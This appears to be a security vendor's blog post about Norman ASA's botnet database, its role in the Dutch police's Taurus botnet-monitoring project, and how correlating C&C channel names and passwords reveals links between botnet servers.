Norman and the Taurus Project: How to use Information and Take those Botnets Down!!!

The Dutch National High Tech Crime Unit (NHTCU), a cyber-division of the police (KLPD), in a presentation at the GOVCERT.NL Symposium, today recognized Norman ASA’s forensic contributions in assisting multinational police agencies in monitoring and disabling large, multinational cybercrime botnets. The Taurus Botnet Monitoring project coordinated by the government agencies was detailed in a presentation at the symposium. Norman made available to authorities its full Botnet Database, a collection of detailed botnet information that is updated 24×7, containing information to access the Command and Control servers and botnet channels. The Norman Botnet Database was put into a special tool that is able to monitor all the different botnets and collect commands send by the Command and Control servers to the affected systems.

Norman’s participation in the Taurus project started by making our extensive Botnet Database available to the project. How does Norman build its Botnet Database?
Every piece of potentially malicious code is processed by the Norman SandBox through the Norman SandBox Analyzer. This will reveal the behavior of the sample and that will get documented. If the sample is connecting to C&C Servers, we will store the full communication getting a good overview of what the C&C Server is telling the bot(net).

Given that communication can be encrypted, with the SandBox Analyzer Pro we can reveal the encryption algorithm(s) used.

And of course then it is easy to also retrieve the encryption key(s). Having both the algorithm(s) and key(s), all communication can be read and stored.
Now, besides storing all the domains, IP’s, credentials, etc of all the botnets and which samples are related to which botnets, what can you do more with that data besides using it to take them down?
For one, you can get a chronological overview of systems that have been used as C&C Server by botnets.

Another option would be to correlate the data and that actually is giving some interesting information. Using some older data to demonstrate this, in 2007 I made a screen dump from our Analysis Desktop’s Botnet database, in particular from a – at that time – new botnet. It showed that we had 3 different pieces of unique malware all connecting to the same Channel (Matrizzz) of the Botnet on the same C&C Server.

I repeated that exercise today for the sake of the presentation and it showed that the Matrizzz channel on this server is now accessed a few more times. But it also shows that a similar channel (matrizzzz) is present on another Server. Examining the code showed that this indeed is related.

Going to the data on that server, we can see that this C&C server is actually hosting two botnet channels. I could go deeper into the second channel, but the phrase “matrix” is used a lot in a wide variety of botnet/channels, so that won’t reveal too much information.

If we continue on the channel we started with, it is noticeable that the channel password everywhere contains the phrase “makako123”. If we start to do a search on that phrase, another Server shows up.

And at that server, there is a channel. Now this exercise could continue for a few more cycles and we would reveal more and more information and more and more nodes that are interlinked. A nice graph is building. If we would do this for every Botnet, we will actually see that specific servers are part of multiple botnets and there is a big overlap.
And before you know it, what seems to be Chaos is actually Organized

Funnily enough, the same graphs can be made about Who knows Who on social networks…